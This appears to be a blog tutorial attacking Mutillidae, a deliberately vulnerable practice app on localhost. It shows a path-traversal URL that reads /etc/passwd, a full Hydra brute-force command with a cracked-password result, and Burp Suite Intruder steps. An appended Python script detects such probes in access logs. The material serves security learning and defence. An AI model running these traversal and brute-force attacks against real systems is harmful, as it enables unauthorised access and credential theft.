Posted by shinigami at 23:05
After installing Mutillidae, I will now try to attack it using the Brute Force and LFI methods.
LFI (Local File Inclusion)
- Open Mutillidae in your browser; you will see the URL below:
http://localhost/mutillidae/index.php?page=home.php
- The "?page=home.php" part of the URL above indicates that this application reads a file from the local server. We can try to read another file on the system, for example /etc/passwd:
http://localhost/mutillidae/index.php?page=../../../../../../etc/passwd
- Wow, can you see that?
Brute Force
- Run Hydra with this command:
hydra -l admin -P pass.txt 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
Usage
hydra -> the program name
-l -> the username
-P -> the wordlist
127.0.0.1 -> your target host; it can be changed to a domain name
http-post-form -> the service module
"/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"
/mutillidae/index.php?page=login.php -> application path
username -> input form field
password -> input form field
login-php-submit-button -> input form field of the submit button
Not Logged In -> error message when the application failed to log in
- Run this command.
- Ok, the password is found:
Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only
Hydra (http://www.thc.org/thc-hydra) starting at 2012-09-15 12:51:15
[DATA] 8 tasks, 1 server, 8 login tries (l:1/p:8), ~1 try per task
[DATA] attacking service http-post-form on port 80
[80][www-form] host: 127.0.0.1 login: admin password: adminpass
[STATUS] attack finished for 127.0.0.1 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-09-15 12:51:16
Please note that you must be careful when giving Hydra the error message. If you give it the wrong one, you will never get the password, even though the correct password is in your wordlist.
- By the way, I will also try the brute force attack using Burp Suite.
- We need to configure the network settings of our browser; in this case I assume you are using Firefox.
- Click Edit->Preferences->select the Advanced tab->select Network->Settings.
Host : 127.0.0.1
Port : 8080
- Open Burp Suite: Start menu->Backtrack->Vulnerability Assessment->Web Vulnerability Assessment->Web Application Proxies->Burp Suite
- Go to the Proxy tab->Intercept tab and make sure that "intercept" is on
- Go back to Firefox and open the login page of Mutillidae
- You will see Burp Suite blinking in the taskbar
- Go to the Burp Suite window
- Click the forward button
- Go to the Mutillidae login page and fill in a random username and password (test only)
For example, I'm using user:pass and then clicking login. You will see Burp Suite blinking. Go back to the Burp Suite window.
- Right-click on the raw column and select "send to intruder"
- Go to the Intruder tab,
Block some text and click clear
Select "Cluster Bomb" for the attack type
- Still on the Intruder tab, select the Payload tab
Select "1" at payload type, and add a username (you can add more than one username)
Select "2" at payload set, and add a list of random passwords
- Go to the Burp Suite menu, select Intruder->Start Attack, and wait for the brute force to run.
If the username and password are cracked, you will see a result that looks like this...
http://localhost/mutillidae/index.php?page=login.php
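Seen from the defender's side, both techniques in this post leave a clear trail in the web server's access log. The script below is an added example, not part of the original post: it flags "page" values that escape the web root (including double-encoded ones) and counts login POSTs per client per minute. The log lines are constructed, and the Common Log Format and the threshold of 5 are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample in Common Log Format (not taken from the original post).
SAMPLE_LOG = [
    '127.0.0.1 - - [15/Sep/2012:12:40:02 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5120',
    '127.0.0.1 - - [15/Sep/2012:12:41:10 +0000] "GET /mutillidae/index.php?page=../../../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.7 - - [15/Sep/2012:12:42:30 +0000] "GET /mutillidae/index.php?page=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1843',
    '10.0.0.9 - - [15/Sep/2012:12:51:15 +0000] "POST /mutillidae/index.php?page=login.php HTTP/1.1" 200 4096',
] + ['127.0.0.1 - - [15/Sep/2012:12:51:15 +0000] "POST /mutillidae/index.php?page=login.php HTTP/1.1" 200 4096'] * 8

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*"')
LOGIN_THRESHOLD = 5  # assumed limit: login POSTs per client per minute

def page_param(url):
    """Return the fully decoded `page` parameter of a request URL, or None."""
    values = parse_qs(urlsplit(url).query).get("page")
    if not values:
        return None
    value = values[0]  # parse_qs has already decoded one layer
    for _ in range(3):  # undo double/triple URL-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def is_traversal(page):
    """True if the value leaves the web root: a '..' segment or an absolute path."""
    return page.startswith("/") or ".." in page.split("/")

def scan(lines):
    """Return (LFI probes as (ip, page), {(ip, minute): count} at or over the threshold)."""
    lfi, logins = [], Counter()
    for line in lines:
        m = LINE_RE.match(line)
        page = page_param(m.group(4)) if m else None
        if page is None:
            continue
        ip, stamp, method = m.group(1, 2, 3)
        if is_traversal(page):
            lfi.append((ip, page))
        elif method == "POST" and page == "login.php":
            logins[(ip, stamp[:17])] += 1  # bucket by dd/Mon/yyyy:hh:mm
    return lfi, {k: n for k, n in logins.items() if n >= LOGIN_THRESHOLD}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A fixed one-minute bucket is the simplest counting window; a burst that straddles a minute boundary is split across two buckets, so a sliding window is the usual refinement.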